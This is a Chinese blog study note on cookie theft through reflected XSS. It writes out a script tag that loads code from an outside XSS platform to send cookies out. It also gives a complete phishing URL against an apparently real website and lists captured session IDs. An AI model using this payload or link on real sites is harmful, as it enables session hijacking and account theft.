网安入门17-XSS(打Cookie)

最新推荐文章于 2024-05-29 11:09:09 发布
最新推荐文章于 2024-05-29 11:09:09 发布
阅读量557 收藏 9
点赞数 8
分类专栏: CISP-PTE备考之路 文章标签: xss 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61499194/article/details/136294910
版权

危害:获取Cookie

开始学习反射型XSS时不知道有什么危害,弹个1没啥用,于是我们利用经典的<script>alert(document.cookie)</script>展开攻击

经过这波操作,我们获得了 敏感信息PHPSESSID=94a7gvd2icb3hva0u255jjadl0

反射型也是一样的,在Edge中存好,用Chrome打开,弹的是两个不同的Cookie

打Cookie实战

目标:云图AI开放平台

来到这个实战网站,两个浏览器注册两个账号zyh666,和zyh999,由于同源策略,Edge和火狐登录同一URL不共享cookie
发现一个搜索框,测试可以弹,证明这个网站存在XSS

此时4个步骤以及完成了第一步,接下来的中间人可以选择一个云服务器,也可以用一个XSS平台
XSS平台-XSS安全测试平台
在这个平台创建一个项目,选择无keepsession

查看代码选项,恶意JS选择第一条payload复制到网站的URL中,构造钓鱼链接

恶意JS:<sCRiPt sRC=//xss.yt/WnT3></sCrIpT>

钓鱼链接:

https://moomoopark.com/index.php?pro_keyword=%3CsCRiPt%20sRC=//xss.yt/WnT3%3E%3C/sCrIpT%3E&c=search&m=index

zyh666访问钓鱼链接,测试可以收到cookie
其中PHPSESSID=k5ckg7164sldfd8dm4phom2qq5


接下来开始攻击,假设这个钓鱼链接被zyh999点击,那么我们就收到了zyh999的Cookie!
其中PHPSESSID=3c4161sbsijrqoq8pjmhquus37


实战打Cookie成功

挑不动
关注
  • 8
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
XSS利用方式
qq_39654116的博客
01-17 788
目录xss平台利用xss平台地址创建过程页面操作xss直接cookie xss平台利用 xss平台地址 xss.fbisb.com 这个平台上有众多的xss代码 创建过程 点击的项目进行创建 ![[Pasted image 20210109141006.png]] 进入项目创建的构造框,我们进行项目的描述 ![[Pasted image 20210109141019.png]] 配置代码 勾选默认模块与keepsession ![[Pasted image 20210109141102.png]] 下面
anti-xss:AntiAntiXSS | 通过PHP防止跨站点脚本(XSS
05-02
:Japanese_secret_button: 反XSS “跨站点脚本(XSS)是一种通常在Web应用程序中发现的计算机安全漏洞。XSS使攻击者能够将客户端脚本注入到其他用户查看的网页中。跨站点脚本漏洞可能被攻击者用来绕过相同原产地策略...
webug--XSS
gclome的博客
06-03 658
9 反射型xss 将1换成<script>alert('xss')</script>,成功框! 可是怎么找flag呢? 猜测在cookie文件里,于是使用<script>alert(document.cookie)</script> 出flag! 10 存储型xss 这一关有点鸡肋,访问进去,找到留言框,输入<script>alert(xss)</script>,就把这两关的flag全部了出来 12 DOM型xss 访问链接,先输
jQuery-with-XSS 检测jQuery版本是否存在XSS漏洞
09-29
网站中包含大量的动态内容以提高用户体验,比过去要复杂得多。所谓动态内容,就是根据用户环境和需要,Web应用程序能够输出相应的内容。动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting, 安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS )有所区分,故称XSS)的威胁,而静态站点则完全不受其影响。
【CTF练习】BUU XSS COURSE 1(XSS获取cookie登录)
m0_73866435的博客
02-28 1159
有两个尝试点。
XSS基础入门/从0到1/非常基础/cookie/会话劫持
ChenD的学习笔记
10-10 1439
cookie介绍、XSS类型、XSS盗取cookie、利用Cookie劫持会话
lucy-xss-filter
04-30
Lucy-XSSXssFilter,XssPreventer Lucy-XSS是一个包含两个防御模块的开源库,用于保护Web应用程序免受XSS攻击。 它支持基于白名单规则的安全策略。 当前的默认规则是Naver的标准。 您可以根据需要更改默认规则。...
spring-boot-xss
05-13
< c xss=removed></ script >< p> < c xss=removed></ p></ body ></ html > 该示例演示了如何在HTML上下文中正确地编码不受信任的值alert(7)HTML,但是在[removed]中是不安全的。 但是...
Bug Bounty Tip - i春秋Self-XSS变废为宝的奇思妙想
04-30
Bug Bounty Tip - i春秋Self-XSS变废为宝的奇思妙想 i春秋技术分享,将self-xss利用扩大化,奇思妙想可以借鉴。
【网络安全】XSSCookie外带攻击姿势及例题详析
等风来
05-19 6879
XSSCookie 外带攻击就是一种针对 Web 应用程序中的 XSS(跨站脚本攻击)漏洞进行的攻击,攻击者通过在 XSS 攻击中注入恶意脚本,从而窃取用户的 Cookie 信息。攻击者通常会利用已经存在的 XSS 漏洞,在受害者的浏览器上注入恶意代码,并将受害者的 Cookie 数据上传到攻击者控制的服务器上,然后攻击者就可以使用该 Cookie 来冒充受害者,执行一些恶意操作,例如盗取用户的账户信息、发起钓鱼攻击等。
网络安全学习笔记——盗取Cookies跨站脚本(XSS
just do it
07-24 1068
使用替换过了的URL发给目标,诱导目标点击,然后目标的cookies就会回XSS攻击平台上,展开就可以看到该目标的PHPSESSID,然后在自己的同源网站上,笔记本按Fn+F12,调出Hackerbar,点击存储,然后把PHPSESSID换成攻击之后得到的,删掉浏览框里面多余的东西,剩下XXX.php即可,刷新之后就会登录该目标的账号——,SESSID——中间键,是Apache分配的,唯一的“身份证”,从SESSID入手,就可以查取用户的相关信息。
XSS平台偷取cookie使用+XSS漏洞
NSQ0207的博客
07-24 2280
在线利用网站:复制代码输入复制的代码查看获取到的cookie二、xss触发方式(1)在标签外:(2)在标签内:使用事件型:(先用引号闭合,看看是否有过滤如果有使用大小写试验)在标签内不能使用标签,使用标签标签内资源类型是url使用伪协议。
XSS脚本(存储型xss获取肉鸡的cookies)
Lion
11-10 606
查看HTML源码前端是否存在某些限制文本框长度、符号分割(空格,逗号等)、标签禁用、符号禁用、标签符号过滤等JS或方法。参考:https://www.freebuf.com/articles/web/153055.html。3、检查xss的验证机制,是通过前端验证或是后端验证、还是前后端均验证。1、首先依次排查标签是否被禁用(script、img、iframe等)2、测试排查某些符号是否被禁用转义(尖括号、引号、空格、等号)4、针对1、2、3过程的排查,进行针对性的注入。标签转义、双重转义、加密。
网安入门16-XSS(三种类型)
m0_61499194的博客
02-26 1150
XSS漏洞,全称跨站脚本攻击(Cross-Site Scripting),是代码注入的一种。它允许恶意用户将代码注入到网页上,原理是攻击者将恶意代码注入到可信网站的页面中,当用户浏览该页面时,恶意代码就会被浏览器执行,从而达到攻击者的目的。盗取用户敏感信息,如Cookie、账号密码等;控制用户浏览器,进行钓鱼攻击、重定向等;篡改网页内容,进行欺诈等。反射型XSS:攻击者将恶意代码通过URL参数、表单提交等方式注入到目标网页中,当用户访问该网页时,恶意代码就会被执行;存储型XSS
XSS & CSRF 】访问时篡改密码——以DVWA-High为例
Mr_Fmnwon的博客
05-23 1040
第二阶段,增加了一个CSRF-Token。关于XSS的利用,cookie的泄露,在上述博客中已很清晰地说明白了~从一开始无法利用,到思考需要的条件,一步步实现,对CSRF、XSS的理解更深了。唯一觉得遗憾的是,chat强大、解放编写代码门槛的同时,也让我编码能力——程序员的核心能力——迟滞不前甚至降低许多。。。唉。
【详细介绍WebKit的结构】
cz88888888666的博客
05-23 625
WebKit是一个开源的浏览器引擎,主要用于渲染网页内容,它最初由苹果公司为其Safari浏览器开发,目前被多种浏览器和应用程序使用,包括所有基于iOS和macOS的浏览器,WebKit的设计目标是提供快速、精准且流畅的网页浏览体验。
amis 文件上传 & 大文件分块上传
qq_42152032的博客
05-26 1027
在信息安全领域,经常会用到MD5、SHA1、SHA256算法。这三种算法都属于散列算法,或者叫作哈希算法。它们具有输入任意长度,输出长度固定,以及单向性(无法根据散列值还原出消息)的特点。关于MD5MD5是一个安全散列算法,输入两个不同的明文不会得到相同的输出值,根据输出值,不能得到原始的明文,即其过程是不可逆的。所以要解密MD5没有现成的算法,只能穷举法,把可能出现的明文,用MD5算法散列之后,把得到的散列值和原始的数据形成一个一对一的映射表,通过匹配从映射表中找出破解密码所对应的原始明文。
前端实习记录——git篇(公司拉取项目流程)
最新发布
Web人
05-29 258
【git】拉取项目流程
-xmx -xms -xmn -xss
07-08
您的第一个问题是关于 JVM 的参数,分别是 -Xmx、-Xms、-Xmn 和 -Xss。 - -Xmx:指定 JVM 的最大堆内存大小,用于存放对象实例和数组。例如,-Xmx2g 将最大堆内存设置为 2GB。 - -Xms:指定 JVM 的初始堆内存大小,也是堆内存的最小值。例如,-Xms256m 将初始堆内存设置为 256MB。 - -Xmn:指定 JVM 的年轻代堆内存大小,用于存放新创建的对象。例如,-Xmn512m 将年轻代堆内存设置为 512MB。 - -Xss:指定每个线程的栈内存大小。例如,-Xss1m 将栈内存设置为 1MB。 这些参数可以通过在启动 Java 程序时使用 java 命令来设置。例如: java -Xmx2g -Xms256m -Xmn512m -Xss1m YourJavaProgram 希望这回答了您的问题!如果您还有其他问题,请继续提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

挑不动

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值